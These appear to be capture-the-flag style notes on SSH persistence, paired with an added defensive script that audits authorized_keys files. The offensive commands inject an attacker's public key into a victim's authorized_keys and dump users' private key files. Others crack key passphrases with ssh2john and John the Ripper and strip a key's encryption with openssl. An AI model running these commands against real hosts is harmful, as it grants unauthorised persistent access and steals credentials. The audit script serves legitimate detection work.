Persistence

SSH Key Injection
Generate SSH Keys
ssh-keygen -t ed25519 -f key
To make sure the key works properly, give it restricted permissions (ssh refuses to use a private key that is readable by other users); the file here is the `key` generated above:
chmod 600 key
  • If the authorized_keys file doesn't exist, create one with your public key:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" > /home/dvir/.ssh/authorized_keys
  • Otherwise, append your public key:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" >> /home/dvir/.ssh/authorized_keys
Now just connect with your private key:
ssh -i key dvir@10.10.11.8
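The same mechanism seen from the defending side: the script below is an added example, not part of the original notes, that audits an authorized_keys file against an allowlist of approved public keys and flags authorized_keys files that other local users could write to. All file paths and key material it creates are constructed samples, except the third entry, which reuses the public key shown above to play the role of the unexpected key; the allowlist format (one "type base64" per line) and the option-stripping regex are this example's own conventions.

```bash
#!/bin/bash
# Added audit example (not from the original notes). Flags authorized_keys entries
# that are not on an approved list, and authorized_keys files that other local
# users could write to. All paths and key material below are constructed samples.

# Print the "type base64" part of every key entry in an authorized_keys file,
# dropping leading options (e.g. command="...",no-pty) and trailing comments.
# Blank lines and comment lines are skipped; a line that contains no recognisable
# key is passed through unchanged so it still shows up as unknown.
extract_keys() {
    grep -v -E '^[[:space:]]*(#|$)' "$1" |
        sed -E 's#^.*((ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp[0-9]+|sk-[a-z0-9-]+@openssh\.com) [A-Za-z0-9+/=]+).*$#\1#'
}

# Print entries present in authorized_keys ($1) but absent from the allowlist ($2),
# where the allowlist holds one approved "type base64" per line.
unknown_keys() {
    extract_keys "$1" | grep -v -x -F -f "$2" || true
}

# Print "ok" when the file is writable only by its owner, otherwise
# "writable-by-others:<mode>" ("missing" if it does not exist). A group- or
# world-writable authorized_keys file lets any such user grant themselves access.
check_mode() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || { echo "missing"; return 0; }
    case "$mode" in
        *[2367]?|*[2367]) echo "writable-by-others:$mode" ;;   # group or other write bit set
        *) echo "ok" ;;
    esac
}

# Build constructed sample files in a temp dir and print its path. The third
# authorized_keys entry reuses the injected public key from these notes.
make_sample() {
    dir=$(mktemp -d)
    cat > "$dir/allowlist" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedAdminKey0000000000000000000000
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedBackupKey0000
EOF
    cat > "$dir/authorized_keys" <<'EOF'
# approved: admin workstation
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedAdminKey0000000000000000000000 admin@workstation

command="/usr/local/bin/backup",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedBackupKey0000 backup@host
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c
EOF
    chmod 600 "$dir/authorized_keys"
    # A second copy with sloppy permissions, to show the mode check firing.
    cp "$dir/authorized_keys" "$dir/authorized_keys_loose"
    chmod 664 "$dir/authorized_keys_loose"
    echo "$dir"
}

# Demonstration on the constructed sample; on a real host point these at
# /home/*/.ssh/authorized_keys and /root/.ssh/authorized_keys instead.
sample=$(make_sample)
echo "Unexpected keys in $sample/authorized_keys:"
unknown_keys "$sample/authorized_keys" "$sample/allowlist"
echo "Mode check (strict copy): $(check_mode "$sample/authorized_keys")"
echo "Mode check (loose copy):  $(check_mode "$sample/authorized_keys_loose")"
```

Comparing on the key blob rather than the whole line matters because an attacker can hide an entry behind a harmless-looking comment or bury it after a long option list; the mode check catches the other common weakness, an authorized_keys file that a different local account can append to.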

Using Existing keys

Look for private keys:
find /home/user -name "id_*" -exec cat {} \;
  • Once you find one, copy the key into your .ssh directory and ssh in.

  • You can also check whether the corresponding private/public key pair is already publicly known by using this repo.

Crack the passphrase

  • Use ssh2john to generate a hash from the key:

ssh2john private_key > private_key.hash
  • Then feed this hash into John the Ripper:

john private_key.hash --wordlist=/path/to/wordlist

Clone the key

  • Sometimes you need to convert an encrypted (passphrase-protected) RSA key into its unencrypted form; openssl prompts for the passphrase and writes the plain key:

openssl rsa -in spanishdancer.key -out ~/keys/ariekei-spanishdancer